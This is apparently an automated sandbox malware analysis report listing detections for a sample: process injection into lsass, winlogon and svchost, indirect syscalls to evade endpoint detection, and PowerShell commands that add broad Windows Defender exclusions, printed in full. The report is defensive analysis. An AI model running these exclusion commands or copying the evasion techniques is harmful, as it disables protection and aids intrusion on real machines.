              Source: C:\Windows\System32\winlogon.exeCode function: 54_2_000002D0165ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,54_2_000002D0165ED2A4
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F1517D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,62_2_000002D6F1517D90
              Source: C:\Windows\System32\lsass.exeCode function: 62_2_000002D6F151D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,62_2_000002D6F151D2A4
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FDD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,63_2_0000014E41FDD2A4
              Source: C:\Windows\System32\svchost.exeCode function: 63_2_0000014E41FD7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,63_2_0000014E41FD7D90
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B066218 SetUnhandledExceptionFilter,64_2_000001D15B066218
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B05D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,64_2_000001D15B05D2A4
              Source: C:\Windows\System32\dwm.exeCode function: 64_2_000001D15B057D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,64_2_000001D15B057D90
              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_404.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi64_936.amsi.csv, type: OTHER
              Source: Yara matchFile source: amsi64_7616.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 404, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 936, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7616, type: MEMORYSTR
              Adds a directory exclusion to Windows Defender
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\
              Source: C:\Users\user\AppData\Roaming\LB31.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
              Allocates memory in foreign processes
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\winlogon.exe base: 2D016580000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\lsass.exe base: 2D6F14E0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14E41FA0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dwm.exe base: 1D15B010000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23AF32B0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23C9FD60000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 246ED7B0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 200A1980000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22595FB0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22E670C0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24C19A40000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 275D1FC0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23BBDC90000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 227D8FC0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2DED2C70000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14ACE6B0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 220AEFD0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 241B6950000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 202A22A0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 14D25AA0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21A63950000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1834ABA0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2D8F03D0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 18BAF3C0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 256EBEB0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2568E1B0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 226A7DC0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\spoolsv.exe base: 12A0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1E2C0F50000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22B68FC0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 207EA800000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 11CD6340000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AFDEB70000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 207C0460000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 245A2150000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24708EB0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22F60740000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26E569B0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2CA8FE60000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 1D63DC30000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A799B20000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F6984F0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26481BB0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 166D2DA0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 128DE440000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2101D0E0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: 2D40000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 192D1E50000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26DD2000000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 257155B0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 16443E50000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2C8A7000000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1A9452E0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 29227D20000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22C4F660000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE850000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 281CF7C0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 28843650000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 20D6ED80000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 24618740000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2495FDB0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 17DD92C0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26473470000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23F13F00000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 205ECFC0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1C2AEBD0000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 26878460000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1DCAFC10000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22464430000 protect: page execute and read and write
              Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E4DACB0000 protect: page execute and read and write
              Contains functionality to inject code into remote processes
              Source: C:\Windows\System32\dialer.exeCode function: 49_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,49_2_0000000140001C88
              Creates a thread in another existing process (thread injection)
              Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 1658273C
              Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: F14E273C
              Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FA273C
              Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: 5B01273C
              Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: F32B273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9FD6273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CA6E273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ED7B273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A198273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 95FB273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 670C273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4A4B273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 19A4273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1FC273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: BDC9273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D8FC273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D2C7273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CE6B273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEFD273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B695273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A22A273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 25AA273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A2F273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6395273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ABA273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F03D273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AF3C273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EBEB273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8E1B273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A7DC273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 12A273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C0F5273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D7C273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 68FC273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EA80273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CE9B273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D634273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DEB7273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C046273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A215273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8EB273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6074273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 569B273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8FE6273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3DC3273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 99B2273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 984F273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 81BB273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D2DA273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DE44273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1D0E273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2D4273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1E5273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D200273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 155B273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 43E5273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A700273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6825273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 452E273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 27D2273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E5BE273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B07C273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4F66273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AE85273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1B9F273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F3CD273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CF7C273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4365273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6ED8273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1874273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5FDB273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D92C273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7347273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 13F0273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: ECFC273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AEBD273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AFC1273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6443273C
              Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DACB273C
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\ProgramData\Mig\Mig.exeNtQueryInformationProcess: Indirect: 0x7FF6AEA3A315
              Source: C:\Users\user\AppData\Roaming\LB31.exeNtQuerySystemInformation: Indirect: 0x7FF70B0F2108
              Source: C:\Users\user\AppData\Roaming\LB31.exeNtQueryInformationProcess: Indirect: 0x7FF70B0FA315
              Source: C:\ProgramData\Mig\Mig.exeNtQueryInformationProcess: Indirect: 0x7FF6AEA3A43D
              Source: C:\Users\user\AppData\Roaming\LB31.exeNtQuerySystemInformation: Indirect: 0x7FF70B0C6D37
              Source: C:\Users\user\AppData\Roaming\LB31.exeNtQueryInformationProcess: Indirect: 0x7FF70B0FA43D
              Source: C:\ProgramData\Mig\Mig.exeNtQuerySystemInformation: Indirect: 0x7FF6AEA32108
              Source: C:\ProgramData\Mig\Mig.exeNtQuerySystemInformation: Indirect: 0x7FF6AEA06D37
              Injects a PE file into a foreign processes
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B010000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6950000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE9B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD6340000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC30000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2DA0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: 2D40000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A7000000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
              Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE850000 value starts with: 4D5A
